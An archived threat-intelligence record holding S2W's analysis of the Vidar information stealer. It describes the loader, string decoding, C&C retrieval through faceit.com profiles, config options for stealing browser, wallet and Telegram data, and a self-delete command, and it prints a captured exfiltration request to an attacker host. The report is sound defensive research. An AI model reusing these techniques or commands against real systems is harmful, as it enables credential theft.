{
	"id": "72a2285e-8bcc-4ea5-99a8-763fa8ee094a",
	"created_at": "2026-04-06T00:19:22.545472Z",
	"updated_at": "2026-04-10T03:20:23.1523Z",
	"deleted_at": null,
	"sha1_hash": "6bcc78341d22a61bcd70d585127fd7e32cc4ebaf",
	"title": "Deep Analysis of Vidar Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4348699,
	"plain_text": "Deep Analysis of Vidar Stealer\r\nBy S2W\r\nPublished: 2022-05-23 · Archived: 2026-04-05 16:23:55 UTC\r\nAuthor: Sojun Ryu @ Talon\r\n[Figure: Monkey Thief]\r\nExecutive Summary\r\nVidar Stealer is information-stealing malware, mainly distributed as spam mail or as cracked commercial software and keygen programs. When installed, it collects data such as infected-device information, accounts, and browser history and leaks it to the C\u0026C server. In particular, it is one of the stealer logs widely traded on the DDW, and logs of infected PCs worldwide are being sold.\r\nPreviously, Vidar Stealer communicated with a C\u0026C server hard-coded inside the malware, but from February 3, 2021, the method was changed to dynamically read the C\u0026C server from a legitimate site.\r\nVidar Stealer switches its target software frequently in order to steal credential information stored in various browsers and programs. Therefore, the C\u0026C server is continuously changing, so an automated response is necessary.\r\nS2W LAB has been analyzing Vidar Stealer malware behaviors, tracking changes, and preventing related damage by collecting logs that are traded through the DDW.\r\nhttps://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed\r\nPage 1 of 23\r\n[Figure: The flow of Vidar Stealer behavior]\r\nRelated Articles\r\n1. Deep Analysis of Raccoon Stealer, Seonghoe Kim\r\n2. Story of the week: Stealers on the Darkweb, Hyunmin Suh \u0026 Minjei Cho\r\nThe Routes of Infection\r\nRecently, Vidar Stealer has mainly been disguised as Windows activation software. Because the Windows product is expensive, many people download illegal activation software to use it for free. In addition to Windows, many cases are disguised as cracked commercial software, keygen software, etc. 
Users may recognize the risk of the software, as most anti-virus products are able to detect it and alert users, but they tend to ignore the warning and execute it at their own risk.\r\n[Figure: Windows 10 Pro x64 keygen, Ardamax Keylogger 5.2 Crack, SmartMovie v3.25 Keygen]\r\nLast year, Vidar Stealer was distributed in South Korea through spam emails impersonating the Fair Trade Commission. The contents of the email lure victims into opening the attached file, which is disguised as an official request letter. If the victim executes the attached file, which carries a document file icon, the user is infected by Vidar Stealer.\r\n[Figure: Email disguised as the Fair Trade Commission]\r\nAs Vidar Stealer has so far not been distributed using advanced techniques or serious vulnerabilities, users who do not use illegal programs and who access suspicious sites with caution can sufficiently prevent infection.\r\nVidar Stealer Behavior Analysis\r\n1. Loader\r\nVidar Stealer is packed with an unknown loader to hinder analysis. This loader’s characteristic is that the data, strings, binaries, and other data necessary for malicious behavior have no regularity. Because of this feature, it is challenging to detect this loader completely with a static method using detection signatures and Yara rules. In addition, even if the loader is detected, there is a limit to how accurately the actual internal malicious code can be distinguished.\r\n[Figure: Code that assigns execute permission (VirtualProtect)]\r\n[Figure: Additional binary decoding routine]\r\nOn March 31, 2021, a malware analyst on Twitter (@c3rb3ru5d3d53c) named this loader “DerpLoader” and noted that Vidar Stealer, as well as other stealer malware such as KPot Stealer and Raccoon Stealer, use it. As a result of our analysis, it was confirmed that all three stealers use the same loader. Stealers mainly use EXE distribution methods disguised as specific programs, so they are easily exposed to AV. It is assumed that various stealers use this loader to maximize detection evasion.\r\n[Figure: Vidar Stealer and DerpLoader mentioned on Twitter]\r\n2. Vidar Stealer\r\nDecode strings\r\nWhen Vidar Stealer is executed by the loader, the encoded strings are first decoded and the strings required for malicious behavior are extracted. As the decoding method, RC4 and Base64 are used in combination. For the RC4 key, a string composed of 18 digits is used, and each sample uses a different key.\r\n[Figure: Encoded strings in Vidar Stealer]\r\n[Figure: Decoding strings using CyberChef]\r\nDynamic collection of C\u0026C servers\r\nIn the former Vidar Stealer malware, the C\u0026C server address was hard-coded. However, starting on February 3 this year, a method of dynamically collecting C\u0026C servers has been used, relying on API functions provided by “faceit.com”, a Russian game-related community. The advantage of this method is that the faceit.com site cannot be blocked because it is a legitimate site.\r\nUnder the former method, if the C\u0026C server used by the malware is taken down, the malware becomes useless. However, with dynamic collection, the malware’s C\u0026C can be updated automatically by changing the content on “faceit.com” without modifying the malware every time.\r\nURL to get C\u0026C\r\nhttps://api.faceit[.]com/core/v1/nicknames/[Attacker's nickname]\r\n[Figure: C\u0026C server is included in the ‘about’ field of the JSON data]\r\nNormal DLL file download\r\nAfter that, Vidar Stealer downloads the legitimate DLL files required for malicious activity.\r\nNormal DLL file path\r\nC:\\ProgramData\\\r\nNormal DLL files related to Firefox\r\n1. freebl3.dll\r\n2. mozglue.dll\r\n3. msvcp140.dll\r\n4. nss3.dll\r\n5. softokn3.dll\r\nNormal DLL files related to C/C++\r\n1. vcruntime140.dll\r\n2. msvcp140.dll\r\nRequest configuration data\r\nAfter downloading the DLL files, the malware requests a specific page containing the configuration values. On this page, option values specifying which data to collect from the infected device are given. Each option value is separated by ‘,’ and there are a total of 12 values. Among these, some option values are not actually used. In addition, passwords.txt, information.txt, outlook.txt, and files\\Soft are unconditionally collected regardless of the options.\r\nExample of configuration data page\r\n1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*\r\nOptions 1, 5, 6, 10, 11: Not used\r\nOption 2: Option to steal the browser’s Autofill, Cookies, and Credit Card data\r\nOption 3: Option to steal the browser’s History and Downloads\r\nOption 4: Option to steal wallet data\r\nOption 7: Option to steal Telegram data\r\nOption 8: Option to take a screen capture\r\nOption 9: Option to steal certain files\r\nWhen the 9th option is activated, all files matching specific file names are collected using the last string, which is separated by ‘;’. The format is as follows, and the collected files are saved in files\\Files\\[Work Folder].\r\nString format for collecting files\r\n[Save Folder];[Target Path];[Target file name list];[Maximum file size];[Separator]\r\nData Theft\r\nThe target software list is as follows. The target browsers may differ for each sample because the attacker can customize the target browser list. As the version of Vidar Stealer increases, the collection range widens, and as of March 21, the highest version identified is 38. All stolen information is collected in the path below.\r\nPath for collecting data\r\nC:\\ProgramData\\[A-Z0-9]{25}\\files\\\r\nCompress the collected folder\r\nAfter collecting all the data, the “\\files” folder is compressed into a ZIP file. The path of the created ZIP file is as follows, and a different file name is used for each version.\r\nC:\\ProgramData\\[A-Z0-9]{25}\\[MachineGUID][0-9]{10}.zip\r\nSend data\r\nAfterward, it transmits the ZIP file containing the stolen data, along with the infected device ID, device information, and the version of Vidar, to the C\u0026C server.\r\nDownload additional payload\r\nIf the attacker has configured additional functions, there is a function to download and execute additional malware after leaking information to the C\u0026C server. After requesting HTTP_QUERY_REFRESH, if the result contains the string “http”, it accesses the given URL to read additional configuration data. After this process, it finally extracts the URL and downloads the malicious payload.\r\nFlow of downloading additional payload\r\nC\u0026C Server → Download configuration data → Get download URL → Download another malware\r\nPath and pa\r\nC:\\ProgramData\\[A-Z0-9]{16}.exe “:Zone.Identifier”\r\nSelf-deleting\r\nAfter performing all malicious actions, Vidar Stealer deletes its own traces with the command below.\r\n“C:\\Windows\\System32\\cmd.exe” /c taskkill /im [Filename] /f \u0026 erase [File path] \u0026 exit\r\nAnalysis of the domain used in the attack\r\nS2W LAB has been continuously monitoring and tracking Vidar Stealer’s C\u0026C server construction method for three months since February 2021.\r\n1. api.faceit.com\r\nThe attacker first joined a Russian game-related community called “faceit.com”. After that, the attacker has been updating the C\u0026C server using the Profile section of the user information page, and the malware requests this information through the API.\r\n[Figure: C\u0026C server stored in the user information page]\r\nThe attacker has changed the community nickname, and with it the C\u0026C server collection URL, over about three months. There are a total of 6 nicknames identified so far, and the creation time and collected C\u0026C servers are summarized below. When the nickname is replaced, the C\u0026C server is not updated for the existing nickname, and the existing C\u0026C servers are no longer used.\r\nList of “faceit.com” addresses used to collect C\u0026C servers\r\nhttps://api.faceit.com/core/v1/nicknames/yetveirrifcu, Created time: 2021-02-03 15:39:24 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/tronhack, Created time: 2021-02-19 13:13:17 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/slowyen, Created time: 2021-03-01 19:34:49 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/sergeevih, Created time: 2021-03-11 20:36:28 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/dendytest, Created time: 2021-03-15 17:23:12 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/xeronxik123, Created time: 2021-03-18 11:07:19 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/vyh62lapin, Created time: 2021-03-30 20:46:17 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/sslamlssa, Created time: 2021-04-26 15:50:43 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/ramilgame, Created time: 2021-05-04 08:40:44 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/legomind, Created time: 2021-05-17 23:39:57 (UTC)\r\nhttps://api.faceit.com/core/v1/nicknames/pavel23puef, Created time: 2021-05-24 17:09:30 (UTC)\r\n2. C\u0026C server\r\nThe attacker used many domains and IPs because the C\u0026C server was changed within a day or every 3 to 4 days. We arranged the C\u0026C server domains that we collected over three months and were able to confirm some characteristics.\r\nMost domains registered through NameSilo\r\n[Figure: Numerous C\u0026C servers registered through NameSilo]\r\nE-mail addresses the attacker used to register the domains. In particular, “xeronxik123” is strongly suspected, as the ID was also used as a faceit.com nickname.\r\n1) kiseleva.veronika.73@gmail.com\r\n2) xeronxik123@gmail.com\r\nInitially, the attacker registered and used the domains, but after that, it seems that legitimate domains were compromised and used as C\u0026C servers. Recently, Vidar communicates with IP-type C\u0026C servers, and sometimes one is reused when the nickname is changed.\r\nVidar Stealer C\u0026C Server List\r\nThe latest version of the C\u0026C server list is continuously updated on the Google Sheet.\r\n3. Admin site\r\nVidar Stealer can manage infected devices and control overall statistics through the admin site “my-vidar.com”.\r\n[Figure: my-vidar.com/auth/login]\r\nVidar Stealer in DDW\r\n1. Vidar Stealer rental post\r\nVidar Stealer is MaaS-type malware sold on dark web forums. As shown in the post below, sales are being made, and it has been actively traded from at least November 2018 to the present. Attackers collect information by targeting specific users with the rented malware, or sell the collected logs again to an unspecified number of users on the DDW.\r\n• Prices\r\n7 days → $130\r\n14 days → $200\r\n30 days → $300\r\n60 days → $580\r\n90 days → $750\r\n[Figure: Vidar Stealer sales post on the dark web]\r\n[Figure: Inside the Admin page]\r\n2. Vidar Stealer Log Sales Post\r\nPosts selling logs collected by Vidar Stealer on the DDW are also being found steadily. Mostly, rather than logs for a single target, many logs covering various countries are sold. Such postings are often found to include Korea.\r\n[Figure: Vidar Stealer Log Sales in Deep Web Forum]\r\nSince the collected log files are divided by country code, such as KR below, it is easy to identify the Korean victims, and password information and infected device information are stored inside the files.\r\n[Figure: Vidar Stealer log files]\r\n[Figure: Korean site cookie information in the log file]\r\nConclusion\r\nIn the latest version of Vidar Stealer, the C\u0026C servers are constantly changed through a dynamic acquisition method, but only one C\u0026C server is active at the time of execution. Therefore, if a new C\u0026C server can be collected by monitoring the C\u0026C server collection URL, information leakage can be prevented even if a device is infected with the malicious code, and measures can be taken by detecting infected devices attempting to connect.\r\nS2W LAB is monitoring the continuously updated Vidar Stealer C\u0026C server collection URL, and through this, the C\u0026C servers are also being collected. In addition, we continue to analyze and track changes in Vidar Stealer’s C\u0026C connection method.\r\nIn the past, stealer malware caused direct damage to individuals rather than companies, but with the recent increase in telecommuting due to the coronavirus, stealer malware is likely to steal accounts that can access corporate business networks. Since account stealing is attempted not only for web browsers but also for various software, if important accounts are stolen, it is possible to infiltrate the corporate network. So, if these logs are sold to ransomware attack groups, the damage is out of control.\r\nIn order to prevent Vidar Stealer infection, users should be cautious about executing programs from unknown sources, executing cracked or illegal activation programs, and opening spam emails.\r\nWe also provide further information regarding various stealers via Xarvis Enterprise. Please refer to the figures below.\r\n[Figure: Relation Graph of Vidar Stealer on Xarvis Enterprise]\r\n[Figure: Credential Leak Monitoring Dashboard inside Xarvis Enterprise]\r\nAppendix\r\nAppendix 1: Example of the leaked file\r\nFilename: information.txt\r\nVersion: 37.5\r\nDate: Fri Feb 12 08:24:56 2021\r\nMachineID: eeeb5d54-7880-42a7-b542-739bbc26cf4b\r\nGUID: {846ee340-7039-11de-9d20-806e6f6e6963}\r\nHWID: eeeb5d54-7880-42a7-b542-9d20-806e6f6e6963\r\nPath: C:\\Users\\admin\\AppData\\Roaming\\build.exe\r\nWork Dir: C:\\\\ProgramData\\\\A2KA889SJFAXH2KBIL2MLRZVK\r\nWindows: Windows 7 Professional [x64]\r\nComputer Name: USER-PC\r\nUser Name: admin\r\nDisplay Resolution: 1280x720\r\nDisplay Language: en-US\r\nKeyboard Languages: English (United States)\r\nLocal Time: 12/2/2021 8:24:56\r\nTimeZone: UTC-0\r\n[Hardware]\r\nProcessor: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz\r\nCPU Count: 4\r\nRAM: 4095 MB\r\nVideoCard: Standard VGA Graphics Adapter\r\n[Processes]\r\n---------- System [4]\r\n------------------------------ smss.exe [272]\r\n- csrss.exe [352]\r\n- wininit.exe [400]\r\n- csrss.exe [412]\r\n- winlogon.exe [456]\r\n- services.exe [496]\r\n- lsass.exe [504]\r\n- lsm.exe [512]\r\n- svchost.exe [616]\r\n- IMEDICTUPDATE.EXE [1224]\r\n- srvpost.exe [1356]\r\n- SearchIndexer.exe [1412]\r\n- taskhost.exe [1796]\r\n….\r\n[Software]\r\nAdobe Flash Player 27 ActiveX [27.0.0.187]\r\nAdobe Flash Player 27 NPAPI [27.0.0.187]\r\nAdobe Flash Player 27 PPAPI [27.0.0.187]\r\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 [12.0.30501.0]\r\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 [14.21.27702]\r\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 [14.21.27702]\r\nSkype 7.39 [7.39.102]\r\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 [14.21.27702.2]\r\n-2019 Redistributable (x64) - 14.21.27702 [14.21.27702.2]\r\nRealtek AC'97 Audio\r\nAppendix 2: Communication\r\n[Figure: api.faceit.com connection packet (HTTPS connection)]\r\nJSON data received from C\u0026C\r\n{\r\n \"result\": \"ok\",\r\n \"payload\": {\r\n \"country\": \"ca\",\r\n \"registration_status\": \"active\",\r\n \"about\": \"duckclack.com|\",\r\n \"matches_left\": 0,\r\n \"private_tournaments_invitations\": {},\r\n \"user_type\": \"user\",\r\n \"games\": {},\r\n \"matches_not_played\": 0,\r\n \"settings\": {\r\n \"language\": \"en\"\r\n },\r\n \"active_team_id\": null,\r\n \"newsletter_promotions\": false,\r\n \"version\": 4,\r\n \"created_by\": \"anonymous\",\r\n \"favorite_tournaments\": [],\r\n \"activated_at\": \"Wed Feb 03 15:39:24 UTC 2021\",\r\n \"invitations_remaining\": 10,\r\n \"steam_id\": \"\",\r\n \"ongoing_rooms\": {},\r\n \"updated_by\": \"5ee7a37c-54b8-4dac-a211-0329602f9398\",\r\n \"guid\": \"5ee7a37c-54b8-4dac-a211-0329602f9398\",\r\n \"private_tournaments\": [],\r\n \"status\": \"AVAILABLE\",\r\n \"guest_info\": {},\r\n \"notification_tournament_joined_starts\": false,\r\n \"friends_ids\": [],\r\n \"flag\": \"\",\r\n \"created_at\": \"Wed Feb 03 15:39:24 UTC 2021\",\r\n \"membership\": {\r\n \"type\": \"free\"\r\n },\r\n \"memberships\": [\r\n \"free\"\r\n ],\r\n \"newsletter_general\": false,\r\n \"nickname\": \"yetveirrifcu\",\r\n \"ongoing_tournaments\": {},\r\n \"socials\": {},\r\n \"website\": \"\",\r\n \"verified\": false,\r\n \"entity_type\": \"user\"\r\n },\r\n \"server_epoch_time\": 1613118241,\r\n \"message\": \"Operation performed correctly.\",\r\n \"env\": \"prod\",\r\n \"you_are\": {\r\n \"roles\": [\r\n \"anonymous\"\r\n ],\r\n \"user\": \"anonymous\"\r\n },\r\n \"version\": \"2.174.3\"\r\n }\r\nConfiguration data for stealing information\r\n1,1,1,1,1,1,1,0,1,1,250,Desktop;%DESKTOP%\\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*passwo\r\nCaptured packet exfiltrating the victim’s data\r\nPOST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, i\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 8698\r\nHost: duckclack.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"hwid\"\r\neeeb5d54-7880-42a7-b542-9d20-806e6f6e6963\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"os\"\r\nWindows 7 Professional\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"platform\"\r\nx64\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"profile\"\r\n399\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"user\"\r\nadmin\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"cccount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"fcount\"\r\n2\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"telegram\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ver\"\r\n37.5\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ccount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"logs\"; filename=\"eeeb5d54-7880-42a7-b542-739bbc26cf4b856836309\r\nContent-Type: zip\r\nPK\r\n...\r\nPK\r\n--1BEF0A57BE110FD467A--\r\nAppendix 3: MITRE ATT\u0026CK\r\n[Figure: MITRE ATT\u0026CK]\r\nSource: https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed"
	],
	"report_names": [
		"deep-analysis-of-vidar-stealer-ebfc3b557aed"
	],
	"threat_actors": [],
	"ts_created_at": 1775434762,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6bcc78341d22a61bcd70d585127fd7e32cc4ebaf.pdf",
		"text": "https://archive.orkl.eu/6bcc78341d22a61bcd70d585127fd7e32cc4ebaf.txt",
		"img": "https://archive.orkl.eu/6bcc78341d22a61bcd70d585127fd7e32cc4ebaf.jpg"
	}
}